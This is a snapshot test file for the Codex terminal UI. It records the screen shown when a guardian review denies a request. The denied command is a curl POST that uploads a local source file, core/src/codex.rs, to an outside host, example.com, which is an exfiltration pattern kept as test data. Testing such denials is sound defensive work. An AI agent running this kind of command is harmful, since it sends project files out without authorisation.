codex-rs/tui/src/chatwidget/snapshots/codex_tui__chatwidget__tests__app_server_guardian_review_denied_renders_denied_request.snap
---
source: tui/src/chatwidget/tests/guardian.rs
assertion_line: 432
expression: normalize_snapshot_paths(term.backend().vt100().screen().contents())
---







✗ Request denied for codex to run curl -sS -i -X POST --data-binary
  @core/src/codex.rs https://example.com

• Working (0s • esc to interrupt)


› Ask Codex to do anything

  gpt-5.6-sol default · /tmp/project · Read Only
